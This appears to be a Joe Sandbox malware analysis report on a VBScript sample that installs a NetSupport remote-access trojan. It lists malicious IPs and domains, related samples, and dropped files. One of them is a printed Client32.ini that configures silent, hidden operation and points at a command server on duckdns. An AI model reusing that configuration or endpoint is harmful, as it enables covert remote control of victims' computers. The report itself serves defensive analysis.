                                                                                  http://www.symauth.com/rpa00wscript.exe, 00000006.00000003.114061495045.0000000005C05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F10000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046703873.000000000B53A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048065766.0000000005BE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114076941291.0000000005F7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114046703873.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114053227288.0000000005C68000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://stackoverflow.com/q/2152978/23354Pyyidau.vbs.exe, 00000004.00000002.113967321914.0000000009530000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://www.quovadis.bm0Pyyidau.vbs.exe, 00000004.00000002.113948697299.00000000031ED000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000002.115184199438.00000000033DF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115021312689.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.114973594833.00000000033D7000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115069509491.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.114997019143.00000000033E7000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115033721477.00000000031EF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.114974072870.00000000033DA000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.114951277329.00000000033DF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115102531113.00000000031EF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115046659044.00000000033F2000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115069858643.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115149779823.00000000031EF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115046659044.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115172921966.00000000033DF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115046037274.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115033607252.00000000033EE000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115008881521.00000000033E8000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.115115628288.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000026.00000002.114307415040.0000000002C73000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000026.00000003.114303592438.0000000002C5F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown

                                                                                      World Map of Contacted IPs

                                                                                      • No. of IPs < 25%
                                                                                      • 25% < No. of IPs < 50%
                                                                                      • 50% < No. of IPs < 75%
                                                                                      • 75% < No. of IPs

                                                                                      Public IPs

                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                      176.126.113.166
                                                                                      		okolinabeauty.comUkraine
                                                                                      		9063SAARGATE-ASVSENETGmbHDEtrue
                                                                                      104.26.1.231
                                                                                      		geo.netsupportsoftware.comUnited States
                                                                                      		13335CLOUDFLARENETUSfalse
                                                                                      185.170.144.66
                                                                                      		megaeth1337.duckdns.orgunknown
                                                                                      		59753VDWELLEREEtrue

                                                                                      General Information

                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                      Analysis ID:1561295
                                                                                      Start date and time:2024-11-23 02:51:27 +01:00
                                                                                      Joe Sandbox product:CloudBasic
                                                                                      Overall analysis duration:0h 15m 6s
                                                                                      Hypervisor based Inspection enabled:false
                                                                                      Report type:full
                                                                                      Cookbook file name:default.jbs
                                                                                      Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                      Run name:Suspected VM Detection
                                                                                      Number of analysed new started processes analysed:39
                                                                                      Number of new started drivers analysed:0
                                                                                      Number of existing processes analysed:0
                                                                                      Number of existing drivers analysed:0
                                                                                      Number of injected processes analysed:1
                                                                                      Technologies:
                                                                                      • HCA enabled
                                                                                      • EGA enabled
                                                                                      • AMSI enabled
                                                                                      Analysis Mode:default
                                                                                      Sample name:Pyyidau.vbs
                                                                                      Detection:MAL
                                                                                      Classification:mal100.bank.troj.expl.evad.winVBS@62/246@4/3
                                                                                      EGA Information:
                                                                                      • Successful, ratio: 66.7%
                                                                                      HCA Information:
                                                                                      • Successful, ratio: 98%
                                                                                      • Number of executed functions: 154
                                                                                      • Number of non-executed functions: 271
                                                                                      Cookbook Comments:
                                                                                      • Found application associated with file extension: .vbs

                                                                                      Warnings

                                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, WmiPrvSE.exe, svchost.exe
                                                                                      • Execution Graph export aborted for target Pyyidau.vbs.exe, PID 5876 because it is empty
                                                                                      • Execution Graph export aborted for target msiexec.exe, PID 8392 because there are no executed function
                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                      • Report size exceeded maximum capacity and may have missing network information.
                                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                      • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                      Simulations

                                                                                      Behavior and APIs

                                                                                      TimeTypeDescription
                                                                                      20:53:36API Interceptor28x Sleep call for process: Pyyidau.vbs.exe modified
                                                                                      20:53:57API Interceptor1x Sleep call for process: msiexec.exe modified
                                                                                      20:54:46API Interceptor3206598x Sleep call for process: client32.exe modified

                                                                                      Joe Sandbox View / Context

                                                                                      IPs

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      104.26.1.231file.exeGet hashmaliciousNetSupport RATBrowse
                                                                                      • geo.netsupportsoftware.com/location/loca.asp
                                                                                      file.exeGet hashmaliciousNetSupport RATBrowse
                                                                                      • geo.netsupportsoftware.com/location/loca.asp
                                                                                      CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                      • geo.netsupportsoftware.com/location/loca.asp
                                                                                      Advanced_IP_Scanner_2.5.4594.12.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                      • geo.netsupportsoftware.com/location/loca.asp
                                                                                      Advanced_IP_Scanner_2.5.4594.12.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                      • geo.netsupportsoftware.com/location/loca.asp
                                                                                      file.exeGet hashmaliciousNetSupport RATBrowse
                                                                                      • geo.netsupportsoftware.com/location/loca.asp
                                                                                      NeftPaymentError_Emdtd22102024_jpg.exeGet hashmaliciousNetSupport RATBrowse
                                                                                      • geo.netsupportsoftware.com/location/loca.asp
                                                                                      NeftPaymentError_Emdtd22102024_jpg.exeGet hashmaliciousNetSupport RATBrowse
                                                                                      • geo.netsupportsoftware.com/location/loca.asp
                                                                                      Update.jsGet hashmaliciousNetSupport RATBrowse
                                                                                      • geo.netsupportsoftware.com/location/loca.asp
                                                                                      update.jsGet hashmaliciousNetSupport RATBrowse
                                                                                      • geo.netsupportsoftware.com/location/loca.asp

                                                                                      Domains

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      geo.netsupportsoftware.comfile.exeGet hashmaliciousNetSupport RATBrowse
                                                                                      • 104.26.0.231
                                                                                      file.exeGet hashmaliciousNetSupport RATBrowse
                                                                                      • 104.26.0.231
                                                                                      KC0uZWwr8p.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                      • 104.26.0.231
                                                                                      KC0uZWwr8p.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                      • 104.26.0.231
                                                                                      72BF1aHUKl.msiGet hashmaliciousNetSupport RATBrowse
                                                                                      • 172.67.68.212
                                                                                      hkpqXovZtS.exeGet hashmaliciousNetSupport RATBrowse
                                                                                      • 104.26.0.231
                                                                                      file.exeGet hashmaliciousNetSupport RATBrowse
                                                                                      • 104.26.1.231
                                                                                      file.exeGet hashmaliciousNetSupport RATBrowse
                                                                                      • 104.26.1.231
                                                                                      CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                      • 172.67.68.212

                                                                                      ASNs

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      VDWELLEREEna.elfGet hashmaliciousUnknownBrowse
                                                                                      • 185.170.144.84
                                                                                      kj5f8keqNK.elfGet hashmaliciousUnknownBrowse
                                                                                      • 185.170.144.84
                                                                                      https://bbavnetcash-empreasasnet.lat/local_pibee/login_pibee.php/Get hashmaliciousUnknownBrowse
                                                                                      • 185.170.144.32
                                                                                      10J.zipGet hashmaliciousRedLine, SectopRATBrowse
                                                                                      • 185.73.125.96
                                                                                      bIgxdEEcXm.exeGet hashmaliciousRedLine, SectopRATBrowse
                                                                                      • 185.73.125.96
                                                                                      efekactk.dll.dllGet hashmaliciousUnknownBrowse
                                                                                      • 185.73.124.161
                                                                                      efekactk.dll.dllGet hashmaliciousUnknownBrowse
                                                                                      • 185.73.124.161
                                                                                      bGNq1S744A.exeGet hashmaliciousUnknownBrowse
                                                                                      • 185.73.124.17
                                                                                      bGNq1S744A.exeGet hashmaliciousUnknownBrowse
                                                                                      • 185.73.124.17
                                                                                      SAARGATE-ASVSENETGmbHDEsora.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                      • 195.66.5.164
                                                                                      arm6.elfGet hashmaliciousUnknownBrowse
                                                                                      • 185.168.9.126
                                                                                      8LNER6Tma8.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                                                      • 176.126.114.74
                                                                                      81zBpBAWwc.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                      • 176.126.113.11
                                                                                      SecuriteInfo.com.Linux.Siggen.9999.16227.30183.elfGet hashmaliciousMiraiBrowse
                                                                                      • 195.66.5.171
                                                                                      45.128.232.240-mips-2024-07-06T07_07_43.elfGet hashmaliciousMiraiBrowse
                                                                                      • 195.66.5.151
                                                                                      DRKi1Olgjp.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                      • 91.184.172.177
                                                                                      arm7.elfGet hashmaliciousMiraiBrowse
                                                                                      • 213.185.75.253
                                                                                      2cO52KdAG9.elfGet hashmaliciousMiraiBrowse
                                                                                      • 213.185.75.229
                                                                                      CLOUDFLARENETUSfile.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                      • 172.64.41.3
                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      • 104.21.33.116
                                                                                      Yssr_Receipt.htmlGet hashmaliciousUnknownBrowse
                                                                                      • 104.17.25.14
                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      • 172.67.162.84
                                                                                      file.exeGet hashmaliciousPureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                      • 172.64.41.3
                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      • 104.21.33.116
                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      • 172.67.162.84
                                                                                      es.htaGet hashmaliciousUnknownBrowse
                                                                                      • 162.159.140.237
                                                                                      https://fax-review-complete-signature-required.s3.us-east-1.amazonaws.com/Derwiiuw45FSDeerwyllakttqyhfffddd/ASgggsh65378Reloadfffax3527paogHjkks/Pdf.htmlGet hashmaliciousUnknownBrowse
                                                                                      • 172.66.46.242

                                                                                      JA3 Fingerprints

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      37f463bf4616ecd445d4a1937da06e19file.exeGet hashmaliciousLummaC, Amadey, CredGrabber, Credential Flusher, Cryptbot, LummaC Stealer, Meduza StealerBrowse
                                                                                      • 176.126.113.166
                                                                                      file.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                      • 176.126.113.166
                                                                                      exe010.exeGet hashmaliciousUpatreBrowse
                                                                                      • 176.126.113.166
                                                                                      file.exeGet hashmaliciousAmadey, XWormBrowse
                                                                                      • 176.126.113.166
                                                                                      S0FTWARE.exeGet hashmaliciousStealc, VidarBrowse
                                                                                      • 176.126.113.166
                                                                                      order requirements CIF-TRC809945210.exeGet hashmaliciousGuLoaderBrowse
                                                                                      • 176.126.113.166
                                                                                      qaHUaPUib8.exeGet hashmaliciousUnknownBrowse
                                                                                      • 176.126.113.166
                                                                                      qaHUaPUib8.exeGet hashmaliciousUnknownBrowse
                                                                                      • 176.126.113.166
                                                                                      Updated Invoice_0755404645-2024_pdf.exeGet hashmaliciousUnknownBrowse
                                                                                      • 176.126.113.166

                                                                                      Dropped Files

                                                                                      No context

                                                                                      Created / dropped Files

                                                                                      C:\Config.Msi\e6def9.rbs

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):42749
                                                                                      Entropy (8bit):5.77822458106707
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:fqjRjFBBtktktktktktktjoQeBG2XOcOgFmuW:CjFAQl2euXW
                                                                                      MD5:C8DEF2779B88FB297552F1A72FC8282E
                                                                                      SHA1:D4597B3FB32ABC8E9B12C1D8054884964029E7AC
                                                                                      SHA-256:B405853A4E87BB5AF78316A32507AF6EF573D44CE95C577AD8F7CE8E3F716296
                                                                                      SHA-512:2BF3E15DC98EFB4D7824EF9A6CA19194A421A3E45CA228B3FFE59CBA94414EB45AE2A5E41ACC788DD93B2E316D122E705B4B0C246EA5C24A68EAEA1F1F075D04
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Config.Msi\e6def9.rbs, Author: Joe Security
                                                                                      Preview:...@IXOS.@.....@..vY.@.....@.....@.....@.....@.....@......&.{CBB68368-7767-4CFF-B3E5-211488346702}..NetSupport Manager..vrep.msi.@.....@.....@.....@......ARPPRODUCTICON.exe..&.{8FA17BDF-C6BA-4483-AA65-62957D834D73}.....@.....@.....@.....@.......@.....@.....@.......@......NetSupport Manager......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....StopDrivers....CloseGatewayTrayIcon....CloseGatewayApp....ProcessComponents..Updating component registration..&.{68985C0A-F4D4-4570-AE52-E556EED30C8C}&.{CBB68368-7767-4CFF-B3E5-211488346702}.@......&.{CBD15933-2EDA-4A68-B11B-B3A1E0540ABB}&.{CBB68368-7767-4CFF-B3E5-211488346702}.@......&.{0C0D3B0B-63FD-42B8-9FCE-56A33E5FE94C}&.{CBB68368-7767-4CFF-B3E5-211488346702}.@......&.{D69F2005-3C0D-4683-90A1-EC4B5AD43C4B}&.{CBB68368-7767-4CFF-B3E5-211488346702}.@......&.{783CBD0A-FEA7-407C-B450-1E275B3563DB}&.{CBB68368-7767-4CFF-B3E5-211488346702}.@......&.{6AB92F9D-58CE-4729-BE0F-FF3C1181ADC5}&.{CBB68368-7767-4CFF-B3

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\AudioCapture.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):82400
                                                                                      Entropy (8bit):6.714981336409031
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:a6Y+3bZm8/vLk957pyPkD/bFRFpmPcW+gee/AjHG6ee/gjHB:a6Y+rQ8/Tk9Rp5zFpmPl+gepjm6eljh
                                                                                      MD5:F60CE9D311CEE59250BAFAC6E6F1593A
                                                                                      SHA1:4838E4FD7F855BA75C55D9D1AD56A87347E91ABA
                                                                                      SHA-256:5029A368137EF90609E81A7F691743C1804A5DBFC40AE65540DB4831FD2A2087
                                                                                      SHA-512:E4FDD1D011BAA90DBF17CB3BB0C02BF82B450ED153D45E511BEA03427607B51AFCF201E9EBC18E567D9F5F17531AABB1A70A4E594CE0D1AAEC5AD3D41C6CEF8E
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\AudioCapture.dll, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........\...........7......................:....................2......3......4....Rich...........................PE..L...&.oe...........!.....|...d......E1............0.......................... ......b...............................@...-...t...P.......X................]..........`..................................@...............(............................text....z.......|.................. ..`.rdata..m6.......8..................@..@.data...`...........................@....rsrc...X...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\Client32.ini

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):833
                                                                                      Entropy (8bit):5.511102445378548
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:+BhzEPmPT8FVXR8piBlnxOoK1fXXfDH2ijr6cgEW3ZxA2U6L:+BtuK+VXypGlnxJK1fHfXj+cg3ZD
                                                                                      MD5:1F0F5E39677EEDA38AADC289DEBCC482
                                                                                      SHA1:57E5EA3A82BC22791D1B0317514EF179E8169FB7
                                                                                      SHA-256:7A8D6223702D4049C4106867A5D53370977F5CC59E48964CCB5C48EBB2CAA630
                                                                                      SHA-512:20BCA25C4405F8627F20AD14A692CED65F1B293B77C995F7969784A38F8CCA518F40117CF3907D7282019BA4C54531314361C2312466685BAB90709B4AAE234E
                                                                                      Malicious:false
                                                                                      Preview:0x2634664d....[Client].._present=1..DisableChat=1..DisableChatMenu=1..DisableClientConnect=1..DisableCloseApps=0..DisableDisconnect=1..DisableLocalInventory=1..DisableManageServices=0..DisableMessage=1..DisableReplayMenu=1..DisableRequestHelp=1..IgnoreBroadcastMsg=1..Protocols=2,3..RADIUSSecret=dgAAAPpMkI7ke494fKEQRUoablcA..RoomSpec=Eval..ShowUIOnConnect=0..silent=1..SKMode=1..SysTray=0..UnloadMirrorOnDisconnect=1..Usernames=CHPOK/1895053373....[_Info]..Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32u.ini....[_License]..quiet=1....[Audio]..DisableAudioFilter=1....[General]..BeepUsingSpeaker=0..Password=dgAAAG33wgESVHuw(gLo2JUzbBoA....[HTTP]..GatewayAddress=megaeth1337.duckdns.org:1773..gskmode=0..GSK=GC;H@BDHHJ;D@KBNEF9L>OCDGJ..GSKX=GC;H@BDHHJ;D@KBNEF9L>OCDGJ..Port=1773....[View]..LimitColorbits=7..

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\Client32.upd

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):25
                                                                                      Entropy (8bit):4.243856189774724
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:tekKKv0ov:JR8y
                                                                                      MD5:C05C19B006D57DD4C90785CBE5C7877B
                                                                                      SHA1:34BEEBB832E53E4A3B9B3349919689FDF1401151
                                                                                      SHA-256:00E0C629D5645C15DF66ADCF99E8A0A3E517D7A7876141AE7A752F0585EEC047
                                                                                      SHA-512:BEDE1E24476A12E9B1F29962254B19B357BFDFBE5C6EEC9A2FCA6C1B2105F4CEC1D5872F6BE269EF39D6E5CC542DC587EA9555EF87687BAC64B3FF0DE16C0F8C
                                                                                      Malicious:false
                                                                                      Preview:[Client]..RoomSpec=Eval..

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\Client32Provider.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):104928
                                                                                      Entropy (8bit):6.462496520992136
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:Pm0oPFxNrTUEtzjHlBs/Z5GQFvSeGjreejq:loxrTUEtFBsPGIaemeN
                                                                                      MD5:0488F2B6A068F6FAD881A45E427068A2
                                                                                      SHA1:B1E6B587D1F1A18C3E8F324C06BDE36608DF11A2
                                                                                      SHA-256:E4227BED56D1EA54FE8D4A0D60F68C1B805433F5A083C889F1EBE61D5901654E
                                                                                      SHA-512:56A2615AA3BF101430830C6832E494B2448CF8BCE1DA850AC0A9F6D55304508851590D360666B8926369E1FA925514F544BD5BA24E02192113018B6869079499
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\Client32Provider.dll, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........^..?...?...?...I...?...G...?...G...?...?...?...I...?...I...?...I...?...I...?...I...?..Rich.?..................PE..d...}.oe.........." ................TX..............................................q...............................................p&...............p..\....`.......<...]..............................................................p............................text............................... ..`.rdata...W.......X..................@..@.data....$...0......................@....pdata.......`....... ..............@..@.rsrc...\....p......................@..@.reloc...............6..............@..B................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\Control.kbd

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):3926
                                                                                      Entropy (8bit):5.282899777821006
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:IQIT9RO30TdADA/kAqJNdzzpd47J69Tb1UgzP5DrwBt2U7xwZViSdMD+cGrr1AP2:qTKcMAkLvX47JE1UgzJUtDiO+Lrr1As9
                                                                                      MD5:4D9E1C4B8A78F4C8D6CE5235D42C8F1E
                                                                                      SHA1:6BD13DC34A053F0F40A0D77241AA4BD1EB4DFC42
                                                                                      SHA-256:6D098726CBCDB392BC3A43D4D218072F5CADD4B82D83ADA87BCE65F7642AF602
                                                                                      SHA-512:52953FC6A3474A682436C17AD8308C83514AA20CFFD1844E78426EA809FAFC1F2A2FEDDB09BC7F4D12996728D5017C816CF58AFE3B7CE6B79DC2557BAD7564DE
                                                                                      Malicious:false
                                                                                      Preview:; Keyboard layout file for NetSupport Control..;..; Format of this file is:..; keyboard layout name..; special key mappings..; repeated as often as desired..;..; Special key mappings take the form:..; scancode=character scancode=character .....; where scancode is a hexadecimal number..; (if >= 80 hex, the SHIFTED key is mapped)..; (if >= 100 hex, the ALT Gr key is mapped)....Unmapped Keyboard..FE=x..UK enhanced (102 key) keyboard..83=" 84=. A8=@ 29=` A9=. 2B=# AB=~ 56=\ D6=|....US enhanced (102 key) keyboard..83=@ 84=# A8=" 29=` A9=~ 2B=\ AB=| 56=\ D6=|....German enhanced (102 key) keyboard..29=^ a9=. 103=. 84=. 104=. 88=/ 108={ 89=( 109=[ 8a=) 10a=] 8b== 10b=} 0c=. 8c=? 10c=\ 0d=. 8d=` 110=@ 112=. 15=z 95=Z 1a=. 9a=. 1b=+ 9b=* 11b=~ 27=. a7=. 28=. a8=. ab=' 56=< d6=> 156=| 2c=y ac=Y 132=. b3=; b4=: 35=- b5=_ ....French enhanced (102 key) keyboard..29=. 02=& 82=1 03=. 83=2 103=~ 04=" 84=3 104=# 05=' 85=4 105={ 06=( 86=5 106=[ 07=- 87=6 107=| 08=. 88=7 108=` 09=_ 89=8 109=\ 0A

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\CryptPak.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):186336
                                                                                      Entropy (8bit):7.03311119010921
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:ClXC3/npbt1b5Ooum6yWCmNc4OYZ/Y+ZhJbe8Djbeij6:aXC35t1UOi7Os3le8LeZ
                                                                                      MD5:3B6E06D0861D2D553111BBCB1783BCAD
                                                                                      SHA1:18B3AA65FCC2C4E067A3DC097E833BA5CC82EB40
                                                                                      SHA-256:5B4A2536FCC852D811A351BEF1583F7D5DB516D66474F86EB3766D7EA7AE4749
                                                                                      SHA-512:D80D2F7212A30DA7B625DAEADD64B07543059DDC1E016D650AB3E50A16C8F4BE4194F178D8CED65F6C4857A74C10DA6501E1958A94BEF0AE4529F6134ABBDD03
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\CryptPak.dll, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m...)...)...)...F.y.;... .t.,...)...}...F.L.7...F.M.G...F.|.(...F.}.(...F.z.(...Rich)...................PE..L.....oe...........!.................................................................)....@..........................@..M...D9..<.......4............z...]......H...................................@3..@...............X............................text...0........................... ..`.rdata..=f.......h..................@..@.data....k...P...,...0..............@....rsrc...4............\..............@..@.reloc...............d..............@..B................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\DBI.EXE

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):89568
                                                                                      Entropy (8bit):6.7180392406274745
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:l1rRVUJVO9WjSe8wkrau39b35akGnHf3nVv5Hjwi9RGeSee/OjHAee/+jHri:7w8r76fZ5Hjwi9R3Se3jgeXje
                                                                                      MD5:5720EBD42711018DA15E56216B4B9E11
                                                                                      SHA1:DEC04A1C9CAC50CC2EDEABC8B628EFA615A65D45
                                                                                      SHA-256:4F757A99F8DBB4BC31187140AD048F149CA61A1127923E6F08F6E77EDA8E97F8
                                                                                      SHA-512:D4FB17B218CB82AED5601578F94DF35D3C1A1690D402FCA978281CF6649CCF69C4487F151BE4C0ED2DB2EED716761B5B6CE27393B1A3F5ADAB28F99FA906A72A
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........r.W...W...W...8...F...^...P...W.......8...6...8...r...8...V...8...V...RichW...........PE..L.....oe.....................\.......7............@..........................`............@.................................l...P....0...................]...@......................................P...@...............<............................text...N........................... ..`.rdata...0.......2..................@..@.data....0..........................@....rsrc........0......................@..@.reloc..v....@......................@..B................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\DeskDup.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):117728
                                                                                      Entropy (8bit):6.195705433401619
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:ONMIm6T+oOVZ5gJhPci0sWjcdpqD+MilESrH8q5Ree/BjHWee/TjHw:ONXm6FAOV7pqD+DESrH8q5Regj2eGjQ
                                                                                      MD5:F574F3A16C358D73C5F8A17606E75EBF
                                                                                      SHA1:00D6002C8B2C4C6D9F8BEF02E169777E4B517CF5
                                                                                      SHA-256:7EC3DA30E73122F5B050D503CB2214537E90016EEC059F852230B4F1B87E1B08
                                                                                      SHA-512:1D1664DBAA8E4F086523D9D63B69E15BFF7B8C9CF047C1C964E40DA308957355F6CED2F19D0D57B3D4EE72250E653DA75196F804230C4CCC146ADB0984FEA035
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\DeskDup.dll, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
